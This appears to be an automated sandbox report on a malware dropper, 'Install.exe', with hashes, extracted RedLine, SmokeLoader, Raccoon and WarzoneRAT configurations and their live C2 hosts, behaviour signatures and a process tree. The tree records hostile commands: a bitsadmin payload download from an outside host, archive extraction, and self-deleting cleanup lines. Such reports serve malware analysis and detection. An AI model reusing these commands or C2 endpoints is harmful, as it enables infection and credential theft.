Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1028s
  • max time network
    1064s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    28-04-2021 04:33

Errors

Reason
Machine shutdown

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

redline

Botnet

EUU

C2

download3.info:80

Extracted

Family

redline

Botnet

1414

C2

188.119.112.16:46409

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

16992cd33145ccbb6feeacb4e84400a56448fa14

Attributes
  • url4cnc

    https://telete.in/baudemars

rc4.plain
rc4.plain

Extracted

Family

warzonerat

C2

104.207.138.207:4531

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

bea07c54d843fcd5517bbf13341a9e273e06979b

Attributes
  • url4cnc

    https://tttttt.me/iopioldpsergdg

rc4.plain
rc4.plain

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 55 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 9 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 30 IoCs
  • Modifies registry class 17 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • NTFS ADS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: MapViewOfSection 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:876
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {EA8F6243-1DC7-4452-9D12-135886350871} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
          3⤵
            PID:2068
            • C:\Users\Admin\AppData\Roaming\evsfauh
              C:\Users\Admin\AppData\Roaming\evsfauh
              4⤵
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              • Suspicious behavior: MapViewOfSection
              PID:2500
            • C:\Users\Admin\AppData\Roaming\wdsfauh
              C:\Users\Admin\AppData\Roaming\wdsfauh
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:2352
              • C:\Users\Admin\AppData\Roaming\wdsfauh
                C:\Users\Admin\AppData\Roaming\wdsfauh
                5⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:2716
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:2320
        • C:\Users\Admin\AppData\Local\Temp\Install.exe
          "C:\Users\Admin\AppData\Local\Temp\Install.exe"
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1048
          • C:\Users\Admin\AppData\Local\Temp\is-IKJ0P.tmp\Install.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-IKJ0P.tmp\Install.tmp" /SL5="$3015A,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2008
            • C:\Users\Admin\AppData\Local\Temp\is-PRMQK.tmp\Ultra.exe
              "C:\Users\Admin\AppData\Local\Temp\is-PRMQK.tmp\Ultra.exe" /S /UID=burnerch1
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Adds Run key to start application
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:1608
              • C:\Program Files\Google\ZTRWFMWNKZ\ultramediaburner.exe
                "C:\Program Files\Google\ZTRWFMWNKZ\ultramediaburner.exe" /VERYSILENT
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1148
                • C:\Users\Admin\AppData\Local\Temp\is-LS23P.tmp\ultramediaburner.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-LS23P.tmp\ultramediaburner.tmp" /SL5="$7012C,281924,62464,C:\Program Files\Google\ZTRWFMWNKZ\ultramediaburner.exe" /VERYSILENT
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:1764
                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                    6⤵
                    • Executes dropped EXE
                    PID:268
              • C:\Users\Admin\AppData\Local\Temp\90-85ab1-b75-bda84-ef90859abf4fb\Gowaekaedika.exe
                "C:\Users\Admin\AppData\Local\Temp\90-85ab1-b75-bda84-ef90859abf4fb\Gowaekaedika.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:672
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                  5⤵
                  • Modifies Internet Explorer Phishing Filter
                  • Modifies Internet Explorer settings
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:1120
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1120 CREDAT:275457 /prefetch:2
                    6⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    PID:552
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1120 CREDAT:340994 /prefetch:2
                    6⤵
                    • Modifies Internet Explorer settings
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of SetWindowsHookEx
                    PID:2848
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1120 CREDAT:4076763 /prefetch:2
                    6⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    PID:2684
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                  5⤵
                    PID:1540
                • C:\Users\Admin\AppData\Local\Temp\24-a4150-07e-6a19c-573cba4b2e679\Kizhybipyvu.exe
                  "C:\Users\Admin\AppData\Local\Temp\24-a4150-07e-6a19c-573cba4b2e679\Kizhybipyvu.exe"
                  4⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1992
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gpcbemio.bok\skipper.exe /s & exit
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2472
                    • C:\Users\Admin\AppData\Local\Temp\gpcbemio.bok\skipper.exe
                      C:\Users\Admin\AppData\Local\Temp\gpcbemio.bok\skipper.exe /s
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious use of WriteProcessMemory
                      PID:2640
                      • C:\Users\Admin\AppData\Local\Temp\1394440541.exe
                        C:\Users\Admin\AppData\Local\Temp\1394440541.exe
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2804
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                          8⤵
                            PID:2796
                        • C:\Users\Admin\AppData\Local\Temp\1251026093.exe
                          C:\Users\Admin\AppData\Local\Temp\1251026093.exe
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:2384
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                            8⤵
                              PID:2816
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\gpcbemio.bok\skipper.exe & exit
                            7⤵
                              PID:2564
                              • C:\Windows\SysWOW64\PING.EXE
                                ping 0
                                8⤵
                                • Runs ping.exe
                                PID:2512
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w1wconim.x4n\001.exe & exit
                          5⤵
                            PID:2880
                            • C:\Users\Admin\AppData\Local\Temp\w1wconim.x4n\001.exe
                              C:\Users\Admin\AppData\Local\Temp\w1wconim.x4n\001.exe
                              6⤵
                              • Executes dropped EXE
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:2940
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lros3lwl.aqf\google-game.exe & exit
                            5⤵
                              PID:2984
                              • C:\Users\Admin\AppData\Local\Temp\lros3lwl.aqf\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\lros3lwl.aqf\google-game.exe
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                • Suspicious use of SetWindowsHookEx
                                PID:3052
                                • C:\Windows\SysWOW64\rundll32.exe
                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                  7⤵
                                  • Loads dropped DLL
                                  • Modifies registry class
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2232
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1zer3ebb.dtp\md1_1eaf.exe & exit
                              5⤵
                                PID:2252
                                • C:\Users\Admin\AppData\Local\Temp\1zer3ebb.dtp\md1_1eaf.exe
                                  C:\Users\Admin\AppData\Local\Temp\1zer3ebb.dtp\md1_1eaf.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  PID:2328
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rwbfbf2m.rvx\askinstall39.exe & exit
                                5⤵
                                  PID:2428
                                  • C:\Users\Admin\AppData\Local\Temp\rwbfbf2m.rvx\askinstall39.exe
                                    C:\Users\Admin\AppData\Local\Temp\rwbfbf2m.rvx\askinstall39.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2548
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c taskkill /f /im chrome.exe
                                      7⤵
                                        PID:2180
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im chrome.exe
                                          8⤵
                                          • Kills process with taskkill
                                          PID:2272
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2r5mpixb.4qm\requête.exe & exit
                                    5⤵
                                      PID:2648
                                      • C:\Users\Admin\AppData\Local\Temp\2r5mpixb.4qm\requête.exe
                                        C:\Users\Admin\AppData\Local\Temp\2r5mpixb.4qm\requête.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        PID:2916
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:2068
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                            parse.exe -f json -b firefox
                                            8⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2020
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                            parse.exe -f json -b chrome
                                            8⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:2572
                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                            parse.exe -f json -b edge
                                            8⤵
                                            • Executes dropped EXE
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            PID:1812
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4yzhh2ap.lmt\SunLabsPlayer.exe /S & exit
                                      5⤵
                                        PID:3020
                                        • C:\Users\Admin\AppData\Local\Temp\4yzhh2ap.lmt\SunLabsPlayer.exe
                                          C:\Users\Admin\AppData\Local\Temp\4yzhh2ap.lmt\SunLabsPlayer.exe /S
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Drops file in Program Files directory
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:1052
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                            7⤵
                                            • Drops file in Program Files directory
                                            PID:1656
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                            7⤵
                                              PID:2744
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                              7⤵
                                              • Drops file in Program Files directory
                                              PID:1420
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                              7⤵
                                                PID:2984
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:1384
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:2512
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:1912
                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                      7⤵
                                                      • Download via BitsAdmin
                                                      PID:2836
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pLZQiSM75KRmgEsZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      7⤵
                                                        PID:2364
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -plIt7BMSl5CGLPUK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:3028
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:2780
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:1300
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:1964
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:2684
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                                7⤵
                                                                • Drops file in Program Files directory
                                                                PID:2844
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                7⤵
                                                                  PID:1844
                                                                  • C:\Windows\system32\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HjhHaWQ\HjhHaWQ.dll" HjhHaWQ
                                                                    8⤵
                                                                    • Drops file in System32 directory
                                                                    PID:1816
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:1672
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:1928
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:332
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:1172
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsdBDD5.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:2344
                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                            "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:2584
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sujcgxsh.mee\005.exe & exit
                                                                        5⤵
                                                                          PID:2840
                                                                          • C:\Users\Admin\AppData\Local\Temp\sujcgxsh.mee\005.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\sujcgxsh.mee\005.exe
                                                                            6⤵
                                                                              PID:2744
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fz2rm0s5.mnu\GcleanerWW.exe /mixone & exit
                                                                            5⤵
                                                                              PID:1116
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0rh5qpws.oll\toolspab1.exe & exit
                                                                              5⤵
                                                                                PID:2208
                                                                                • C:\Users\Admin\AppData\Local\Temp\0rh5qpws.oll\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\0rh5qpws.oll\toolspab1.exe
                                                                                  6⤵
                                                                                  • Checks processor information in registry
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Modifies registry class
                                                                                  PID:956
                                                                                  • C:\Users\Admin\AppData\Local\Temp\0rh5qpws.oll\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\0rh5qpws.oll\toolspab1.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:2956
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iuhbusqk.2ez\c7ae36fa.exe & exit
                                                                                5⤵
                                                                                  PID:1172
                                                                                  • C:\Users\Admin\AppData\Local\Temp\iuhbusqk.2ez\c7ae36fa.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\iuhbusqk.2ez\c7ae36fa.exe
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:2476
                                                                        • C:\Windows\system32\conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe "1093037611838015067377492675-1479789431-31423667437884126-695948022-987521304"
                                                                          1⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:2880
                                                                        • C:\Users\Admin\AppData\Local\Temp\143C.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\143C.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:2544
                                                                        • C:\Users\Admin\AppData\Local\Temp\1640.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\1640.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:2352
                                                                        • C:\Users\Admin\AppData\Local\Temp\2657.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\2657.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:1600
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2657.exe"
                                                                            2⤵
                                                                              PID:2316
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /T 10 /NOBREAK
                                                                                3⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:2932
                                                                          • C:\Users\Admin\AppData\Local\Temp\5007.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\5007.exe
                                                                            1⤵
                                                                              PID:2976
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                2⤵
                                                                                  PID:2280
                                                                              • C:\Users\Admin\AppData\Local\Temp\5823.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\5823.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Checks for any installed AV software in registry
                                                                                • Drops file in Program Files directory
                                                                                PID:1912
                                                                              • C:\Users\Admin\AppData\Local\Temp\5E99.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\5E99.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Drops startup file
                                                                                • NTFS ADS
                                                                                PID:1880
                                                                              • C:\Users\Admin\AppData\Local\Temp\64E1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\64E1.exe
                                                                                1⤵
                                                                                  PID:2172
